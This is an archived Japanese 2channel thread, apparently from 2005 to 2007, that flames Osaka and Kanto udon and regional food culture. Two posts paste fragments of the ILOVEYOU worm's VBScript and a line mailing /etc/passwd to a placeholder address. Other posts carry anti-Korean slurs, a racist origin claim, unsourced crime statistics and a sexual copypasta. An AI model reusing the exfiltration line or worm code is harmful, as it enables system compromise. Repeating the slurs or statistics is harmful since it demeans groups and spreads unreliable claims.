5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【大阪うどん】関東ストレス発散スレ【叩き潰せ!】

1 :関東ストレス発散協会:05/01/14 00:44:30 ID:N64V+ECp
このスレは、関東ストレス発散協会運営による、
関東在住者の為のストレス発散掃き溜めスレッドです。
このスレの目的は、大阪食文化の一つとされる饂飩を徹底的に叩きのめし、
我々関東在住者のストレスの原因を根本から排除させることが目的です。
入室の際には異臭、ガスにより体調不良となる恐れがあります。
必ず防毒マスク、防護服、手袋を着用のうえ入室願います。
なお当協会は御利用の際のトラブルには一切責任を負いません。
安全管理は全て自己責任の元でお願い致します。

  ※前スレ:http://food6.2ch.net/test/read.cgi/jnoodle/1100947389/


                           関東ストレス発散協会


2 :名無しさん@お腹いっぱい。:05/01/14 00:56:29 ID:18x35CuU
オイオイ・・・

3 :名無しさん@お腹いっぱい。:05/01/14 01:41:20 ID:MgeWdCL7
ク災玉臭マムコキムコ女のストレス発散場所

4 :名無しさん@お腹いっぱい。:05/01/14 01:51:12 ID:3plPKBkr
ドンドンやれやれ

5 :名無しさん@お腹いっぱい。:05/01/14 01:53:04 ID:HeKA3fXY
>>1
大阪食文化なんて存在しねえよ

6 :名無しさん@お腹いっぱい。:05/01/14 06:34:21 ID:GdqobM2b
1は馬鹿
自作自演の釣り師

7 :名無しさん@お腹いっぱい。:05/01/14 21:57:28 ID:Ho+v7Zzs
大阪に犯罪が多いのは食べ物が原因。
塩っ気が多い。醤油も塩分の多い薄口醤油が主流。
短期でキレやすい。寿命も短い。w

8 :名無しさん@お腹いっぱい。:05/01/14 22:51:17 ID:Ho+v7Zzs
大阪の素晴らしい所
1.「防犯教育」を実地で受けることができる!
 a.駐車違反全国一(大阪市は東京23区の5倍)
 b.車両盗難件数全国一(年間1万件、東京都の約4倍)
 c.交通事故死全国一
 d.ひったくり件数全国一(年間1万件、25年連続全国一)
 e.少年補導件数全国一(年間30万人、全国の約3割)
 f.知能犯件数全国一(年間約9000件、全国の6分の1)
 g.刑法犯件数全国一(年間約30万件)
 h.ポイ捨て全国一
 @.違法野外広告物掲示数全国一

2.「水と安全はただではない」という世界の常識を学びつつ、逞しく生きることができる!
 a.ホームレスの数全国一(約1万人、全国の約半数)
 b.発ガン率全国一
 c.「水がまずい度」全国一
 d.結核患者数全国一(全国平均の3倍)

3.モラルなどという邪魔者に煩わされずに新しいビジネスチャンスを求める素晴らしい難波の商人達
 a.「オレオレ詐欺」発祥の地
 b.「架空請求」発祥の地
 c.覚せい剤の水揚高全国一
 d.密輸拳銃の検挙数全国一
 etc,etc・・・・・・・

いやあ素晴らしい!つねに東京に対抗意識を燃やす(しかし勝ったためしがない)
大阪人にも東京に敵う所があったんですねぇ!!つーか敵いたくありません。

9 :名無しさん@お腹いっぱい。:05/01/15 00:26:52 ID:Qc3avttc
ここはク災玉人の臭マムコピぺデブ女のストレス発散スレ

10 :名無しさん@お腹いっぱい。:05/01/15 00:52:01 ID:rdQrb9Qu
もうやめろよ百済ねぇ。

11 :名無しさん@お腹いっぱい。:05/01/15 01:35:29 ID:nZEltPRa
山田うどんの食い方について述べよ

12 :名無しさん@お腹いっぱい。:05/01/15 11:09:17 ID:+CDnmXIv
なんやねんここw
おれは大阪人やけど
東京のうどんも大阪のうどんも好きやで^^
東京のうどんは冷やしタヌキ?あれ食ってむっちゃウマイおもた!(^o^)

13 :名無しさん@お腹いっぱい。:05/01/16 23:17:39 ID:7cbY+5K2
あげ

大阪叩きたいコピペ厨さん、あなたのスレはこちらですよ〜w

14 :名無しさん@お腹いっぱい。:05/01/16 23:18:12 ID:7cbY+5K2
あ、間違えた

あげ

15 :名無しさん@お腹いっぱい。:05/01/17 01:08:47 ID:XVn6GRHC
キム・マムコさん、あなたのスレはこちらですよ〜w

16 :名無しさん@お腹いっぱい。:05/01/17 03:15:10 ID:z74X89Yh
1は少なくても人生の負け組

17 :名無しさん@お腹いっぱい。:05/01/17 04:48:58 ID:ugXQQs8i
heee

18 :名無しさん@お腹いっぱい。:05/01/17 06:03:10 ID:CenWJR1K
神戸ガンガレ!
ちゃんと見守っているぞ。

19 :名無しさん@お腹いっぱい。:05/01/17 23:13:28 ID:vk80iA+r
あげ

大阪叩きたいコピペ厨さん、あなたのスレはこちらですよ〜w




20 :名無しさん@お腹いっぱい。:05/01/17 23:30:42 ID:qrjVI/AI
もうやめたら・・・関東の人
みっともないよ〜www

21 :名無しさん@お腹いっぱい。:05/01/18 11:41:06 ID:DYw2wvnJ
関係ないけど
なぜ関東人のイメージする大阪と関西人のイメージする東京って
下町の方のイメージなのだ……?

22 :名無しさん@お腹いっぱい。:05/01/18 12:50:37 ID:DYw2wvnJ
まぁ、とりあえず
うどんって大阪の食文化なの?
まあ西日本の食文化ではあるんだろうけど
どちらかと言うと四国の方なのでは?

23 :名無しさん@お腹いっぱい。:05/01/18 22:52:55 ID:YG4K82Te
>>22
うどんは日本古来のもので、各地でいろんな形に発展して、
それぞれ個性的な食文化として根付いている。

どこが一番だとか、どこが中心だ、どこのものなんて考える方がナンセンス。

24 :名無しさん@お腹いっぱい。:05/01/20 23:11:04 ID:Dod9nM23
hee

25 :名無しさん@お腹いっぱい。:05/01/25 19:34:03 ID:zt6x5FJ+
>>23
スレの流れに反していいこと言った。

漏れ、関西生まれ(幼稚園まで)、関東育ち(高校まで)、
現在関西在住(大学〜)の・・・人種どこだろ?

とにかく、関東(の端っこ)のうどんもうまいし、
関西のうどんもうまいのだよ。

でも、関東のうどんの汁を飲み干すのはちょっと無理かも。
結局争いの火種を消せない>>25は氏ねということですねorz

26 :名無しさん@お腹いっぱい。:05/01/25 22:40:42 ID:8F5hrJ1y
geroppa!

27 :名無しさん@お腹いっぱい。:05/01/27 15:16:06 ID:tJgrs0bY
>>25
とりあえず生きろ。

28 :名無しさん@お腹いっぱい。:05/01/28 01:00:02 ID:Xl/5t400
age

29 :名無しさん@お腹いっぱい。:05/01/28 13:52:54 ID:4DNDnmiF
sage

30 :名無しさん@お腹いっぱい。:05/01/29 03:43:22 ID:7zyvsYBJ
四国のうどんは美味しいけどなぁ。
駒沢通り沿いの讃岐うどんの店には、高校時代お世話になった。

大阪のうどんって、東京だとどこで食べられる?

31 :名無しさん@お腹いっぱい。:05/01/29 08:00:33 ID:BmRXGMba
>>30
大阪に来ないと無いよ。
東京のうどんが大阪に無いのと同じ

32 :名無しさん@お腹いっぱい。:05/01/30 17:10:36 ID:Q9Oj447H
大阪風のうどんは、あちこちにある
大阪の人に言わせれば「こんなん大阪の味とちゃう」となる

33 :名無しさん@お腹いっぱい。:05/02/02 17:14:56 ID:u6z+WUtL
この板だと
うどん=西日本の食文化
そば=東日本の食文化とあるけど
3大うどんのうち2つは東日本(群馬と秋田)だし
西日本にも島根県みたいにそばが名物って場所もあるんだけどな。

34 :名無しさん@お腹いっぱい。:05/02/02 23:46:40 ID:mBKwugC9
>>32
大阪風と大阪のものは違う。

>大阪の人に言わせれば「こんなん大阪の味とちゃう」となる

当たり前のこと。
そんなことをゴタゴタ言う31は了見が狭い

35 :名無しさん@お腹いっぱい。:05/02/05 17:43:00 ID:kc6BiVXF
>>31
蒲田駅のめん亭はうまい。看板にも堂々と大阪うどんと書いてある。キツネのあげが
抜群。つゆも最後まで飲めるうまいつゆ。大阪でうどんも良く食べるが松葉屋
阪急茶屋、美々卯などうまいうどんは多いが、そのほかのやすいうどん店はめん亭の
方がはるかにうまい。

36 :名無しさん@お腹いっぱい。:05/02/06 01:14:09 ID:2V7e32NI
は は は は は は !! 必 死 や な こ い つ ら !!
そうかそうかそんなに大阪食文化に嫉妬してるのか、まあ君達がいくら大阪
を罵倒したくても現実の大阪の立派な食文化に変わりはないんやなあ。
むしろ大阪の食を絶賛しないところが同じ日本人として情けない。


37 :名無しさん@お腹いっぱい。:05/02/06 11:17:39 ID:+KvRqgIz
>>36
お前が関西人だと言うことを証明するために、もう一度関西弁で書き直してみな。
できっこないだろうがな、関西叩きたいだけの厨!

38 :名無しさん@お腹いっぱい。:05/02/06 11:19:18 ID:+KvRqgIz
━━━━━━━━━ 絵で見る関西叩き厨の特徴 ━━━━━━━
A 脳内ソースを持ち出し.    ┃B 落ちる時は自分の都合を
  根拠の無いことをわめく   ┃  告げる
    ∧_∧.....             ┃    │     |   │彡
   <#`Д´>O 関西人は    ┃    │   .i|○ │彡<風呂
    Oー、 //|味オンチ!!!  . ┃    │     |   │   入ってくる
ビリビリ\ (;;V;;)/             ┃    │     └― ┘ 
━━━━━━━━━━━━━╋━━━━━━━━━━━━━━━
C 誰とでも背比べしたがる  ┃D  論破され大型コピペ 
   从_从人_从_从人_       ┃ 荒らしを始める
从从ゞ名古屋ももうダメだ !/,  ┃     ∧_∧ <コノヤロォー!!
大阪ウザイ∧__∧  从_从人__ .... ┃     <♯`Д┌―――┐
⌒WWY´<#`Д´>大阪よりマシ! ┃     /    .| i ̄ ̄i |
 从_从( |   | )⌒WW⌒⌒Y..┃    jm==== | i :: i |
━━━━━━━━━━━━━╋━━━━━━━━━━━━━━━
E ムキになると空白アタック  .┃F ソースを要求されると必死で無視
     ((((( ))))))         ┃     (((´⌒`)))
       | |           .┃         l l
       ∧__∧    从_从人__....┃ カタカタ ∧_∧  
   ∩<#`Д´>'') フザケヤガッテ┃     <`Д´#>
   ヾ      ノ  WW⌒⌒Y ┃   _| ̄ ̄||_)_
━━━━━━━━━━━━━╋━━━━━━━━━━━━━━━
G 劣勢になると作戦タイム   ┃H IDを変えて自作自演
     ∧__∧           .┃
    <#`Д´>   ∧_∧   ┃串チェンジ完了    ハゲドウ
    /    つ.  <`Д´ >   ┃     ∧_∧  トコロデハナシハ
  ∧__∧ ̄ ̄ ̄\と   つ   ┃     (`∀´)=>  カワルケド
  <   ,,>     \    |   .┃   _| ̄ ̄||_)_
━━━━━━━━━━━━━╋━━━━━━━━━━━━━━━



39 :名無しさん@お腹いっぱい。:05/02/12 06:24:12 ID:iMBYqX40
妹が風邪をひいて家で寝ていて様子を見に行ったら、
「座薬を入れてよ!熱が下がんないから!」と言ってきた。
親に言えや!と返したら母親は今いない。親父には見られたくない。という事らしい。
妹は後ろ向きに四つん這いになってその下は見るな!と半分ケツをペロリとだした。
ロケット型の白い座薬を妹の※にゆっくりと入れる。
が、直ぐケツの力で這い出してしまう。
奥まで入れろ!と言われ、汚ねぇから触れねぇーよ!と切り返したら、
引出しからコンドームを1つ渡し「これで!」と。
指に不自然にそれをハメると
妹は何度も絶対に変な事するなよ!絶対に変な事するなよ!と言いながら

(省略されました・・全てを読むには ここ を押してください)


40 :名無しさん@お腹いっぱい。:05/02/13 09:51:43 ID:MfSZM9C0
うどんは大阪、そばは東京かな・・・

41 :名無しさん@お腹いっぱい。:05/02/13 12:53:19 ID:POrA06B9
>>33
>3大うどんのうち2つは東日本(群馬と秋田)だし
正式に言えば東北地方
日本を2つに分けてしか言えないのか

42 :名無しさん@お腹いっぱい。:05/02/13 23:07:22 ID:zqL9DM/7
>>40
東京の蕎麦が、大阪の蕎麦より美味しいのは認めるが、そばは東京というのは違うと思う。
東京は蕎麦どころでは無いと思う。

43 :名無しさん@お腹いっぱい。:05/02/22 21:35:16 ID:g+GaBZmh
こんなスレ立てるから関東の人間は馬鹿にされる。
まだ分かんねえのかな?
情けない。

44 :名無しさん@お腹いっぱい。:05/02/22 21:57:25 ID:eZckBTim
大阪のうどんが、東京のうどんより美味しいのは認めるが、うどんは大阪というのは違うと思う。
大阪はうどんどころでは無いと思う。

45 :名無しさん@お腹いっぱい。:05/02/22 23:33:54 ID:F9TyHiab
>>44
コピペ厨フカーツ?

46 :名無しさん@お腹いっぱい。:05/03/03 00:20:28 ID:DjXwu74m
漏れは関東のうどん食っても関西のうどん食ってもストレスが溜まるんだが
そんな場合はどうすればよいのか?

47 :名無しさん@お腹いっぱい。:05/03/03 05:04:50 ID:JVpxjYf0
韓東の犬鍋そばを食べればいい

48 :名無しさん@お腹いっぱい。:05/03/03 08:16:15 ID:rZwzNQMp
>>47
馬鹿フカーツ

49 :名無しさん@お腹いっぱい。:05/03/04 06:33:39 ID:gy8iUelU
山田うどんとかで発狂寸前の関西の諸兄、横浜駅の星のうどんを食え
あじさいや富士そばなんかとは次元が違う


50 :名無しさん@お腹いっぱい。:05/03/04 10:23:10 ID:mhAsW6Xm
>>49
食ったけど、悪いが他と大差ないよ
甘辛くって口にあわん

ただ、山田は論外なのは認める

51 :名無しさん@お腹いっぱい。:05/03/06 20:10:24 ID:yLDpEZIj
>>50
辛いってのはデスレインでも入ってたのか?

52 :名無しさん@お腹いっぱい。:05/03/06 21:59:24 ID:6eHnukvt
>>51
>>50では無いが、この週末に関東を家族で旅してきた。ちなみに関西人です。
関東ではそば、ラーメンを食べたが、いずれもだし、スープが辛くて口に合わなかった。
醤油がきつい、塩辛い、糖分も多く、のどにからむ。
他のものも同様。醤油は塩辛いし、味噌汁も辛い。
まあ、食文化の違いだから仕方ないと思った。


53 :名無しさん@お腹いっぱい。:05/03/07 03:16:26 ID:36rhO3R0
>>52
麺類のスープは辛くて、醤油がきつくて、塩辛くて、糖分が多かったんだね。
で、醤油は塩辛くて味噌汁が辛い。

何だか分からない。

辛いのか塩辛いのか甘いのか、はっきりしてくれ。

54 :名無しさん@お腹いっぱい。:05/03/07 06:44:02 ID:GQgOEjKI
>>53
両方。
要は塩分、糖分とも多いと感じたってことだ。

55 :名無しさん@お腹いっぱい。:05/03/08 00:40:34 ID:S+yVUWg1
辛いと塩辛いは違うだろ。

56 :名無しさん@お腹いっぱい。:05/03/08 08:12:58 ID:lJuCYyRo
>>55
言いたい事はそれだけ?

57 :名無しさん@お腹いっぱい。:05/03/08 21:22:59 ID:S+yVUWg1
大阪人って、味覚が混乱してますね。

58 :名無しさん@お腹いっぱい。:05/03/08 22:03:03 ID:i7HVad8K
>>57
はいはい、大変ですね。

59 :名無しさん@お腹いっぱい。:05/03/09 03:49:08 ID:JBVlE7Vs
大阪人の辛いって、辛い+塩辛いなんだろ。
甘いは、甘い+詐欺行為。

60 :名無しさん@お腹いっぱい。:2005/03/30(水) 20:16:54 ID:he914OsU
甘いは甘い汁。

61 :名無しさん@お腹いっぱい。:2005/03/30(水) 20:21:17 ID:ncXS9hZb
東京のラーメンて世界一まずいだろ

62 :名無しさん@お腹いっぱい。:2005/03/31(木) 00:37:50 ID:6A+AtFVx
はいはい、まずいですよ〜!
それで何か?

63 :名無しさん@お腹いっぱい。:2005/06/20(月) 20:03:55 ID:8X5Bi6E4
はいはい

64 :名無しさん@お腹いっぱい。:2005/06/26(日) 00:44:00 ID:je6Gq2+2
関東のだしは、麺や具材を引き立てるためのもの。天婦羅につゆが必要なように。
だから汁を飲んだり、その味を比較したりするのはちょっときつい。

関西のだしは、麺や具材の味が汁に溶け込み汁の味を楽しむもの。
だからきつねや天婦羅や肉など色んな種類のうどんマニアが存在する。

どちらも芸術品。 

65 :名無しさん@お腹いっぱい。:2005/06/26(日) 17:32:37 ID:wFfYL0Ej
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"


66 :名無しさん@お腹いっぱい。:2005/06/27(月) 15:50:57 ID:TGUEk18I
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"




67 :名無しさん@お腹いっぱい。:2005/09/04(日) 00:34:56 ID:SM1KEQib
魚がいない水溜りに釣り糸を垂れる白痴の安住の地ですな、ここは。


68 :名無しさん@お腹いっぱい。:2005/10/17(月) 13:52:54 ID:C5QRlOwO
あげ

69 :名無しさん@お腹いっぱい。:2005/10/29(土) 13:09:25 ID:vLi1PLem
ナトリウム分でいえば関西の方が多そう(昆布出汁たっぷり
そんな漏れはハマッコ(横浜)だが、饂飩に関する限り「関西」に一票。

70 :名無しさん@お腹いっぱい。:2005/10/30(日) 13:21:13 ID:hWjk+e7I
関東人はこんなスレばっか立ててんのな
関西意識しすぎなんだよw

71 :名無しさん@お腹いっぱい。:2005/12/10(土) 00:49:14 ID:1cwuDmOJ
本当は大阪に憧れてるくせになwww

72 :名無しさん@お腹いっぱい。:2005/12/10(土) 16:12:58 ID:XoQ80dj+
大阪でも東京でもうっとこよりゃよっぽどいいや

73 :名無しさん@お腹いっぱい。:2006/02/27(月) 07:43:32 ID:jhKZBsKs
そもそも頭狂って日本人が食える店ってあるの?
中途半端な料理人が集う集落、頭狂。
東京の水道の蛇口から出る醤油水飲んでると
人間的にも気持ち悪くなるんだろう
東京は単なる店の宝庫。
素材の話をぶり返すことになるが、田舎で魚とか野菜食べ続けてると東京で
いくら良いもの食べても味が悪い。
それをなんとか料理としてまとめる料理人としての腕も悪い。
東京にこないだ行ったが高い・まずい・塩辛い
これが本当に当てはまった。

74 :名無しさん@お腹いっぱい。:2006/07/08(土) 23:47:04 ID:/cz1hRL1
関東の人って他の土地の悪口ばっかり言うよな。
そのくせに韓流マンセーとか言って韓国には服従を示す馬鹿主婦。

75 :名無しさん@お腹いっぱい。:2006/09/15(金) 10:42:48 ID:jg1hRc3H
しこむなよ、暇人

76 :名無しさん@お腹いっぱい。:2006/09/15(金) 16:56:47 ID:p2QNQOXa
>>74
だが、韓西人には服従しない。矛盾している。

77 :名無しさん@お腹いっぱい。:2006/10/06(金) 12:03:01 ID:VB4TJLFo
しょっぱいと辛いの境目は?という全国調査結果

しょっぱい 東日本他全国
辛い 関西のみ
塩辛い 北陸の一部のみ

というのを見たことがある

78 :名無しさん@お腹いっぱい。:2006/10/06(金) 17:53:27 ID:tg1O0hEF

馬鹿が立てた虚しいスレだな

79 :名無しさん@お腹いっぱい。:2006/12/29(金) 02:58:02 ID:9ZSVZvRJ
たかじんウザイ

80 :名無しさん@お腹いっぱい。:2006/12/29(金) 18:56:56 ID:HHwqy6Vl
ここまで魚影の薄い釣り堀も珍しい

81 :名無しさん@お腹いっぱい。:2007/02/28(水) 23:18:25 ID:0j2KZ6gg
大阪は空気も水も全国ワースト1位で臭いからな!それに、関西人はそばやうどんのダシが黒いのは東京だけって思い込んでる…ドアホだよ!九州だって黒いよ!

82 :名無しさん@お腹いっぱい。:2007/02/28(水) 23:30:43 ID:qod+712t
↑ いちばん黒いのはおまえの腹だったりしてなw

83 :ウンチ:2007/03/01(木) 01:45:04 ID:rNL6mApy
また関西悪口スレかよ、大阪のソープで勃起しなかたか?

84 :名無しさん@お腹いっぱい。:2007/03/10(土) 21:10:46 ID:QlZt4rZe
真っ黒い汁が気持ち悪いと言いつつ
すき焼きの残り汁で真っ黒にしたうどんを
美味い美味いと食う不思議な関西人

85 :名無しさん@お腹いっぱい。:2007/03/11(日) 19:51:45 ID:y021iSnv
まあ、大阪人はケツネうどん食いながら漫才でもみてなさい、ってこったw


86 :名無しさん@お腹いっぱい。:2007/03/12(月) 22:55:06 ID:t1j2GntA

「キショいんですけど」

何?キショいってw 日本語使えよ、大阪人w

ま、大阪人はタコ焼きほうばりながら漫才でもみてなさい、ってこったw

87 :名無しさん@お腹いっぱい。:2007/03/12(月) 23:14:08 ID:r+nF3oHB

なんだ、大阪のガキかw


88 :名無しさん@お腹いっぱい。:2007/03/12(月) 23:22:28 ID:EjICaCIs
東京はある意味世界1の都市
大阪じゃ世界に出せない。
一生を魚臭い塩水うどんだけで終わる大阪人w

89 :名無しさん@お腹いっぱい。:2007/03/12(月) 23:33:56 ID:Vn46fksU
関東人には味が解らんw

信長が上方料理を光秀に作らせたが、その味が解らず光秀を叱咤して故事もあるw


権力や規模を持っていても、歴史に裏打ちされた文化的な格差や品性の優劣は補えない
いくら自分たちこそ洗練されているとうぬぼれてもw

90 :名無しさん@お腹いっぱい。:2007/03/13(火) 00:08:20 ID:z1pzXhze
外国人にはジャンク上がりのママゴト(料理?)寿司がお似合い
調理もほとんどする必要もないし、火を使う事もほとんどない。
日本人を騙る韓国人や あのアメリカ人まで簡単に店を出して商売できるからヘルシー生魚江戸寿司は世界中で大人気w
ま 関西風の牛肉をメインにしたすき焼や大阪のしゃぶしゃぶは大人気だねw

91 :名無しさん@お腹いっぱい。:2007/03/13(火) 00:36:38 ID:eJ6TJeYg
虫や獣はそもそも素材の味オンリーの食生活。
関西薄味信者が目指すのは、虫と獣と同じ食生活。
新鮮なものが最高なご馳走。

92 :名無しさん@お腹いっぱい。:2007/03/13(火) 00:45:10 ID:z1pzXhze
これ別スレでも論破されてんのに、関東人てのは・・・

その田舎風濃い味つけの関東人がスキな醤油・鰹節・味噌なども、元は素材の味をたしなむ近畿からの下りモノ

納豆まで近畿からの下りモノなのw

93 :名無しさん@お腹いっぱい。:2007/03/13(火) 22:17:16 ID:Zcxww1Z3
生ゴミの代表「タコ焼き」w

一家に一台タコ焼き製造器w

ごめん、ごめん
一家に一台生ゴミ製造器

94 :名無しさん@お腹いっぱい。:2007/03/13(火) 22:27:02 ID:h5WU3v4R


腐 敗 臭 の た だ よ う 、

腐 っ た ナ マ モ ノ が 必 ず そ う な る 、 ネ バ ネ バ し た 糸 を 引 く

リ ア ル 生 ゴ ミ を 毎 朝 グ チ ュ グ チ ュ 食 っ て る か ら な 

        関     東     人     は     !     w

95 :名無しさん@お腹いっぱい。:2007/03/13(火) 23:21:29 ID:Zcxww1Z3
大阪は街自体が臭いくせして、納豆が臭いとバカにする貧乏舌。
かわいそうだなぁ、納豆蕎麦なんて絶品なのに、匂いがダメなら大葉の刻み
とかおろししょうが入れるといいよ。


96 :名無しさん@お腹いっぱい。:2007/03/13(火) 23:26:36 ID:h5WU3v4R






           関 東 は 街 自 体 が エ イ ズ 蔓 延 で す け ど な に か ?









97 :名無しさん@お腹いっぱい。:2007/03/13(火) 23:53:13 ID:zlv4fXqT
立ち食いそば店でネズミ入りカレー
http://news23.2ch.net/test/read.cgi/news/1173796001/

東京じゃドブ鼠の死骸を隠し味に使うみたいだねw
食ってるお前ら大丈夫なのかよwwwwwwwwwwwwwwwwwwwwwwwwww

98 :名無しさん@お腹いっぱい。:2007/03/14(水) 02:09:15 ID:HXjcVUWR
 パクリの元祖大阪

大阪は朝鮮からの渡来人によって蹂躙された土地。
その時犯され孕まされた人々が現在の大阪人の祖先。
だから先祖である朝鮮人に対して大阪人は複雑な感情を持っている。

はるか千数百年前、朝鮮人、中国人に土下座してパクらせてもらったのが大阪文化。

99 :名無しさん@お腹いっぱい。:2007/03/14(水) 22:04:56 ID:Mm2G1FiP
日本レストランエンタプライズ(本社・東京都港区、荻野洋社長)は13日、
同社がJR新小岩駅(葛飾区)内で営業する立ち食いそば店「あじさい茶屋新小岩店」で、
ネズミが入った鍋で煮たカレールーを使ったそばやうどんなど18食を客に提供していたと発表した。
今のところ、体調不良などを訴える客はいないという。
 同社によると、問題のカレールーが使われていたのは13日午前6時15分から午前8時半までに販売した、
カレーそば・うどん4食▽カレーライス7食▽カレーセット2食など。
午前8時半ごろに店長が鍋にルーを足してかき混ぜる際、お玉に約8センチのネズミの死体が引っかかり、
「ネズミ混入」が分かったという。
 同店は同日から営業を休止。日本レストランエンタプライズは「ご申告頂いたお客様には深くおわびし、
ご返金をさせて頂きます」と謝罪している。客からの苦情などは13日午後11時現在ないという。

http://headlines.yahoo.co.jp/hl?a=20070313-00000150-mai-soci


ドブねずみ食うなよバ関東人wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww



100 :名無しさん@お腹いっぱい。:2007/03/15(木) 01:03:10 ID:08lyCMZ/
パクリの元祖大阪

はるか千数百年前、朝鮮人、中国人に土下座してパクらせてもらったのが大阪文化。

うどんを讃岐からパクリ

京都から懐石料理をパクり

大阪の代表的食べ物は 「 タ コ 焼 き 」w(一家に一台タコ焼き器があると自慢の豪語w)

何にでも生卵をぶっかけて掻き混ぜる下司の食べ方w

懐石を語るのが片腹痛いw

ま、タコはケツネうどん啜りながら漫才でも見てなさいってこったw わかったか!タコ!!wwwwww

101 :名無しさん@お腹いっぱい。:2007/03/15(木) 20:01:17 ID:DP6FNG54
大阪人の思想は自己中という意味で一貫性があるなw
何でも大阪が一番。
人の迷惑も顧みずにやり放題、言い放題。
ひとたび文句を言われれば
大阪だけがいじめられてるってwww

102 :名無しさん@お腹いっぱい。:2007/03/21(水) 12:08:04 ID:TFHczUqU
              -ー=-‐ 、__
          , r '"        ヽ,
          l             ' ,
         /   三ニ=ー-'`=ニiiiiiiiiiiil
        /  ニ'"       `ヾiiiiiiii|
        /  ニ'           'liiiiii|
       ,l   |,r=-;.,_   _,、-=-、|iiiiil
       l  .il .,rェェ、_" :;"ェェ j  |iiiiiil
       | . i| ,,     :;   ,,  iiiiiiil
       ,|   il,    , :: ,    liiiiiill
       l   iil,    ` '      ,|iiiiiiii|
      /     l、  ー- -,ー   イiiiiiiiiill
      /      iゝ、  ̄  /|iiiiiiiiiiiil
     /      i| `ー- ' " ,liiiiiiiiiiii|

    クソスレータ・テルナー[Qtosleata Telnault]
         (1946〜1992 イタリア)

27 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)